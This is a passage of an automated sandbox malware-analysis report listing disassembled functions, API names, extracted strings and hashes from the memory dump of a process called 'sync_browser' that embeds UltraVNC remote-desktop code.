                                                                    • Opcode Fuzzy Hash: 1ce61eda1815472dcf5eec9035d10c7bcc81b982fce4800f6686f7fc95f08c9b
                                                                    • Instruction Fuzzy Hash: C4C1DF22A0C691C1E754BB35C4587FEA7A1EB85B84F984039DA4C477B9CF39E844CB20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateRect$CombineDeleteObjectfree$malloc
                                                                    • String ID:
                                                                    • API String ID: 4067307076-0
                                                                    • Opcode ID: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                                    • Instruction ID: 1c1397fdd5ebe08646e66e51de15fa1d9aac2377cd381e5d62891ac8584ed5ca
                                                                    • Opcode Fuzzy Hash: 20d05e3cb4de81eeb824483ab4ff36b23af894bb04d54c932c434dd6306be1f0
                                                                    • Instruction Fuzzy Hash: E422517260C6858BD724EF25E54066AFBA1F788B84F544135EA8E87B68DB3DE941CF00
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: State$CriticalSection$EnterLeave
                                                                    • String ID:
                                                                    • API String ID: 1138030011-0
                                                                    • Opcode ID: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                    • Instruction ID: 21c72c694047742ffcb7ba18ecc49d6d382abb092ba19e36f663c9e7df6576c7
                                                                    • Opcode Fuzzy Hash: b876853db541de4715cda3d519086bd40b26c50766e7c8197b39221afb36b709
                                                                    • Instruction Fuzzy Hash: 72418F26A1CA62C2F6127B25A90573AE671BF80356F810434DE9D077B89F3EF895C770
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DesktopOpen$ClipboardCloseInput
                                                                    • String ID: vncclient.cpp : vncClientThread $vncservice.cpp : OpenInputdesktop2 NULL$vncservice.cpp : OpenInputdesktop2 OK$vncservice.cpp : SelectDesktop
                                                                    • API String ID: 2872304593-3977938048
                                                                    • Opcode ID: 41fdc7f4038987e70fb881bd2a8b0bfd294fc6fa25dfdabd30afa84ad6723627
                                                                    • Instruction ID: 704e577c2c31136961fbf7ae79a1e2ff5d0947e5178f667aafe84692ff8a23d4
                                                                    • Opcode Fuzzy Hash: 41fdc7f4038987e70fb881bd2a8b0bfd294fc6fa25dfdabd30afa84ad6723627
                                                                    • Instruction Fuzzy Hash: CF12A332A0C6C1C5EB61BB35C8587FDA7A1EB85B84F944139DA4D4B7A9CF38E941C720
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Version$AddressHandleInfoModuleProcSystem
                                                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                                                    • API String ID: 335284197-192647395
                                                                    • Opcode ID: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                    • Instruction ID: 9a49fa11eca59e99104c8f3727c03633e69208df76e79b7d97196a66d5228842
                                                                    • Opcode Fuzzy Hash: bd6ae27e489f82f31fcc2b20e4ae8107fd534e528a9ba4d17229ed8c41967507
                                                                    • Instruction Fuzzy Hash: AA31FC21A0C682C6FA74BB50E45577AB3A0FB95704FC00035E69E86BADEF6DF5458B20
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called, xrefs: 00007FF74002166F
                                                                    • i, xrefs: 00007FF740021809
                                                                    • unable to determine legacy authentication method, xrefs: 00007FF74002173F
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CriticalSection_errnofreemalloc$AllocCurrentEnterHeapLeaveProcess_callnewhrand
                                                                    • String ID: i$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\vncpasswd.h : PASSWD : ToText called$unable to determine legacy authentication method
                                                                    • API String ID: 2847437661-1576074771
                                                                    • Opcode ID: ed06f703ebe15f3b9a86eda3ec199afb5f7cabdb112eedb8e0fa24d8d9d6ed7a
                                                                    • Instruction ID: c91dec98b230de2822a517a6d40444ffce215ebe86e44072b57621032afa90d2
                                                                    • Opcode Fuzzy Hash: ed06f703ebe15f3b9a86eda3ec199afb5f7cabdb112eedb8e0fa24d8d9d6ed7a
                                                                    • Instruction Fuzzy Hash: 25D18022B0C642C5F714BBB594543FDA7A2AB84764F944239DE2E57BE9CF38E841C360
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Create$FileModuleNamePrivateProfile
                                                                    • String ID: Software\UltraVNC$UseRegistry$admin$mslogon
                                                                    • API String ID: 27673491-2056936749
                                                                    • Opcode ID: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                    • Instruction ID: 7616bb50f81eebdcf2eeba067f4428cfa83b04adf2b6476912f020a467c1fd07
                                                                    • Opcode Fuzzy Hash: 49ca59dd5d1ce4bd8261c69328d6c9401fd879975b581b5eca3f4e4a4bfb3057
                                                                    • Instruction Fuzzy Hash: A821ED3661CB86D6E760AF10F4907AAB765FB88354FC01136EA8D02B69DF3CE1148B50
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueVersionWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 337752880-3733053543
                                                                    • Opcode ID: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                    • Instruction ID: 54c717ff79099de132d54b02f424b65ef8d066bb9c1a674aa4bb7021ba79d370
                                                                    • Opcode Fuzzy Hash: ccb4f6b8adec0e5263e9b53491d22d093fe75a13b47b81360652c4a9f3302a15
                                                                    • Instruction Fuzzy Hash: E8113A71A1CA42C6E750FB60F4597AAB3A0FF84B44F800035E68E46B68DF7CE049CB20
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Window$RectVisible$Foreground
                                                                    • String ID:
                                                                    • API String ID: 2499709836-0
                                                                    • Opcode ID: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                    • Instruction ID: 2aded9170791a8ce83666914f3efc21eed0631fea11f46406cf2d5b20be40717
                                                                    • Opcode Fuzzy Hash: 48f1e47169105f78f1c5671409c72268c28db6c5ed06a4c25a4347c71102ace5
                                                                    • Instruction Fuzzy Hash: 30D16B32B08A928FEB14EFA9D5406EC77B2BB88B48B504139DE0D67B5CDE34A441C751
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                    • String ID:
                                                                    • API String ID: 3778485334-0
                                                                    • Opcode ID: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                    • Instruction ID: c86c087e038f98e2372bcabaf44f2bfb42cf9553ce6bd9476a6349f9426b02fb
                                                                    • Opcode Fuzzy Hash: 06a598ca6a92d0ea32fba2d50ca2368aa251c6b52815f87316808892bb3a9e84
                                                                    • Instruction Fuzzy Hash: 9831AE3590CA42C5EB54BB54F8403A9F3A5FB89754F900136EA8E46BA9DF7CE0548B24
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
                                                                    • String ID: SeShutdownPrivilege
                                                                    • API String ID: 1314775590-3733053543
                                                                    • Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                    • Instruction ID: 15bf3eadd278ce25d9c30cb8fd7c83911e178a5659ff75a2062372b6faf4cde0
                                                                    • Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
                                                                    • Instruction Fuzzy Hash: 42012D75A1CA42C1E750FB20F8556AAB7A1FF88B44F845035E68E47768DF3DE048CB20
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ExecuteFileForegroundModuleNameShellWindow
                                                                    • String ID: -startservice$p$runas
                                                                    • API String ID: 3648085421-278061118
                                                                    • Opcode ID: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                    • Instruction ID: 07b222c7f130084cdcebb9b6f21c5c33985d15b1f66a6ff94ecb7cc411839d94
                                                                    • Opcode Fuzzy Hash: 926b2c35945988a05c881ee216fe9ef46aea1621d10afb6dfb6c9793bb67f9ef
                                                                    • Instruction Fuzzy Hash: C801DA3661CB81C5E760AF10F49439AB3A4FB89748F900236E6CD02B68DF7DE114CB50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
                                                                    • String ID:
                                                                    • API String ID: 1870958493-0
                                                                    • Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                    • Instruction ID: 8ba70a13b56efe58acc047b42c9848d8b7922da93797bc93ff88a4e2f16cf363
                                                                    • Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
                                                                    • Instruction Fuzzy Hash: 3C71E873F1C10286F72CFB2499516BCA696BB54348F948139EE0D86BEDDF38B5018714
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000013.00000002.3977430947.00007FF740001000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF740000000, based on PE: true
                                                                    • Associated: 00000013.00000002.3977398850.00007FF740000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977625136.00007FF74010D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977658848.00007FF74010F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740110000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF74015B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977680970.00007FF740188000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF7401C1000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF740234000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000013.00000002.3977776758.00007FF74027C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_19_2_7ff740000000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
                                                                    • String ID:
                                                                    • API String ID: 2715784024-0
                                                                    • Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                    • Instruction ID: 8dc2d84819a68df231291362ce279935805b5ebf931cfa9b2395a4b1f4618243
                                                                    • Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
                                                                    • Instruction Fuzzy Hash: FC019210B2C642C2FA157B6569182B5A291AF49BE1F482134DD2E477E8DE3CF0458230
                                                                    APIs
                                                                      • Part of subcall function 00007FF74000D390: GetModuleFileNameA.KERNEL32 ref: 00007FF74000D3BB
                                                                    • GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057C09
                                                                      • Part of subcall function 00007FF740057650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF740057689
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF7400576DD
                                                                      • Part of subcall function 00007FF740057650: RegCreateKeyExA.ADVAPI32 ref: 00007FF740057722
                                                                      • Part of subcall function 00007FF7400578E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF74005792E
                                                                      • Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF74005796A
                                                                      • Part of subcall function 00007FF7400578E0: RegQueryValueExA.ADVAPI32 ref: 00007FF7400579B2
                                                                    Strings
                                                                    Memory Dump Source
